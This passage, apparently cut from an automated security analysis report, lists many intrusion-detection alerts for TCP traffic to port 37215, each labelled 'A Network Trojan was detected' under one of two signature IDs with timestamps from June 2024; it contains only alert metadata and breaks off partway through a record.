              SID:2835222
              Source Port:33892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991143
              SID:2829579
              Source Port:34546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564706
              SID:2829579
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152995
              SID:2829579
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528039
              SID:2835222
              Source Port:55552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509214
              SID:2835222
              Source Port:37634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276477
              SID:2829579
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911373
              SID:2835222
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168976
              SID:2829579
              Source Port:55100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479797
              SID:2829579
              Source Port:49152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609950
              SID:2835222
              Source Port:50832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154233
              SID:2835222
              Source Port:52822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298625
              SID:2829579
              Source Port:59510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731601
              SID:2829579
              Source Port:53944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213991
              SID:2829579
              Source Port:55718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992736
              SID:2829579
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695610
              SID:2829579
              Source Port:49368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749841
              SID:2829579
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870442
              SID:2829579
              Source Port:40170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710635
              SID:2835222
              Source Port:37754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013029
              SID:2829579
              Source Port:57492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263126
              SID:2835222
              Source Port:35916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711514
              SID:2829579
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042614
              SID:2829579
              Source Port:54282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423554
              SID:2835222
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679907
              SID:2835222
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017070
              SID:2835222
              Source Port:58254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197408
              SID:2835222
              Source Port:51862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379902
              SID:2835222
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088985
              SID:2835222
              Source Port:40612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678950
              SID:2829579
              Source Port:40820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276165
              SID:2835222
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841704
              SID:2829579
              Source Port:52238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027361
              SID:2829579
              Source Port:39222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017030
              SID:2829579
              Source Port:48872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091427
              SID:2835222
              Source Port:40620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165809
              SID:2835222
              Source Port:40538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730245
              SID:2835222
              Source Port:39722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749072
              SID:2835222
              Source Port:59308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749156
              SID:2835222
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174094
              SID:2829579
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552301
              SID:2835222
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176205
              SID:2829579
              Source Port:54862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404379
              SID:2829579
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279322
              SID:2829579
              Source Port:41140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156417
              SID:2829579
              Source Port:35050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450363
              SID:2835222
              Source Port:52958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128952
              SID:2829579
              Source Port:51364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130232
              SID:2829579
              Source Port:42708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993097
              SID:2835222
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753766
              SID:2835222
              Source Port:48612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228245
              SID:2835222
              Source Port:50110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150649
              SID:2829579
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455214
              SID:2829579
              Source Port:56586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708877
              SID:2829579
              Source Port:49698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402321
              SID:2835222
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631968
              SID:2835222
              Source Port:37568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822024
              SID:2829579
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943321
              SID:2835222
              Source Port:40000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564959
              SID:2835222
              Source Port:43968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509157
              SID:2829579
              Source Port:37510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913077
              SID:2835222
              Source Port:49130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028827
              SID:2835222
              Source Port:58570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299196
              SID:2829579
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870319
              SID:2835222
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151858
              SID:2835222
              Source Port:59450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092250
              SID:2835222
              Source Port:39980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409479
              SID:2829579
              Source Port:51866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377302
              SID:2835222
              Source Port:45424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756139
              SID:2835222
              Source Port:46164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.865956
              SID:2835222
              Source Port:54762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197667
              SID:2829579
              Source Port:51910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057334
              SID:2835222
              Source Port:39234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996469
              SID:2829579
              Source Port:45344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374446
              SID:2835222
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417899
              SID:2835222
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321178
              SID:2835222
              Source Port:46078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843558
              SID:2835222
              Source Port:58350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914510
              SID:2835222
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572803
              SID:2835222
              Source Port:56914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789333
              SID:2835222
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152278
              SID:2829579
              Source Port:34890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090676
              SID:2835222
              Source Port:57100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091870
              SID:2829579
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169559
              SID:2835222
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729706
              SID:2829579
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632811
              SID:2835222
              Source Port:59304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526063
              SID:2835222
              Source Port:58784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322177
              SID:2829579
              Source Port:49680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157111
              SID:2835222
              Source Port:51398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488691
              SID:2829579
              Source Port:43838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101896
              SID:2835222
              Source Port:39268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372640
              SID:2835222
              Source Port:43514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195314
              SID:2835222
              Source Port:56234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.200004
              SID:2829579
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087655
              SID:2835222
              Source Port:48470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992413
              SID:2835222
              Source Port:35828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697227
              SID:2829579
              Source Port:58776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350703
              SID:2829579
              Source Port:52592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706839
              SID:2829579
              Source Port:58716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100202
              SID:2835222
              Source Port:50488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371764
              SID:2829579
              Source Port:60960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453233
              SID:2835222
              Source Port:40772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835512
              SID:2829579
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247885
              SID:2829579
              Source Port:46424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106553
              SID:2835222
              Source Port:37626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632692
              SID:2829579
              Source Port:45200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801857
              SID:2835222
              Source Port:38978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841506
              SID:2829579
              Source Port:37022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014555
              SID:2829579
              Source Port:35966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553246
              SID:2835222
              Source Port:43672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839184
              SID:2829579
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112513
              SID:2829579
              Source Port:57032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151012
              SID:2835222
              Source Port:55346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264731
              SID:2835222
              Source Port:38282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669329
              SID:2829579
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266574
              SID:2829579
              Source Port:51168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677356
              SID:2829579
              Source Port:34226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230994
              SID:2835222
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041908
              SID:2835222
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042545
              SID:2835222
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758027
              SID:2829579
              Source Port:52040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075445
              SID:2835222
              Source Port:38888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545809
              SID:2835222
              Source Port:43836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992589
              SID:2835222
              Source Port:49672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422463
              SID:2835222
              Source Port:41826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990655
              SID:2835222
              Source Port:38136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211780
              SID:2829579
              Source Port:41696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669071
              SID:2835222
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227771
              SID:2829579
              Source Port:44324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404658
              SID:2829579
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100474
              SID:2835222
              Source Port:44572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275137
              SID:2829579
              Source Port:58914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546872
              SID:2829579
              Source Port:48110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244473
              SID:2835222
              Source Port:39748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609744
              SID:2829579
              Source Port:41322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094028
              SID:2829579
              Source Port:50670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694302
              SID:2835222
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151418
              SID:2829579
              Source Port:38374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571851
              SID:2829579
              Source Port:54584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266163
              SID:2829579
              Source Port:57582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239770
              SID:2835222
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610482
              SID:2829579
              Source Port:43400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940564
              SID:2829579
              Source Port:34320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456966
              SID:2829579
              Source Port:41752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090715
              SID:2829579
              Source Port:55602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439310
              SID:2835222
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276239
              SID:2829579
              Source Port:34078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075579
              SID:2835222
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543408
              SID:2835222
              Source Port:47040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486117
              SID:2835222
              Source Port:36150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224632
              SID:2835222
              Source Port:58792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354114
              SID:2835222
              Source Port:54030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503366
              SID:2829579
              Source Port:37572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358008
              SID:2829579
              Source Port:48612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174752
              SID:2835222
              Source Port:41758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607006
              SID:2829579
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123453
              SID:2829579
              Source Port:53974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408561
              SID:2835222
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176969
              SID:2835222
              Source Port:43688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338867
              SID:2835222
              Source Port:43598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370797
              SID:2829579
              Source Port:44118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027400
              SID:2835222
              Source Port:50292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660355
              SID:2829579
              Source Port:50618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310192
              SID:2829579
              Source Port:48514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154266
              SID:2835222
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992515
              SID:2829579
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503450
              SID:2829579
              Source Port:47828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757888
              SID:2835222
              Source Port:36812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507638
              SID:2829579
              Source Port:56486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026837
              SID:2829579
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674778
              SID:2829579
              Source Port:44452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731639
              SID:2829579
              Source Port:49278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752757
              SID:2829579
              Source Port:51572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099035
              SID:2829579
              Source Port:54504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725301
              SID:2829579
              Source Port:54684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277624
              SID:2829579
              Source Port:60816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680290
              SID:2835222
              Source Port:52994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213781
              SID:2829579
              Source Port:59456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914457
              SID:2835222
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347701
              SID:2829579
              Source Port:36608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156616
              SID:2835222
              Source Port:41518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276363
              SID:2829579
              Source Port:40544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782986
              SID:2829579
              Source Port:44594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240958
              SID:2835222
              Source Port:60220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612499
              SID:2829579
              Source Port:46546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695228
              SID:2829579
              Source Port:35686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192518
              SID:2835222
              Source Port:44704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077653
              SID:2829579
              Source Port:33646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155498
              SID:2829579
              Source Port:54136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090254
              SID:2835222
              Source Port:50552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135911
              SID:2829579
              Source Port:50122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057286
              SID:2835222
              Source Port:39458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255170
              SID:2835222
              Source Port:54166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255895
              SID:2829579
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309768
              SID:2829579
              Source Port:51668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475056
              SID:2829579
              Source Port:59568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554414
              SID:2835222
              Source Port:47110
              Destination Port:37215
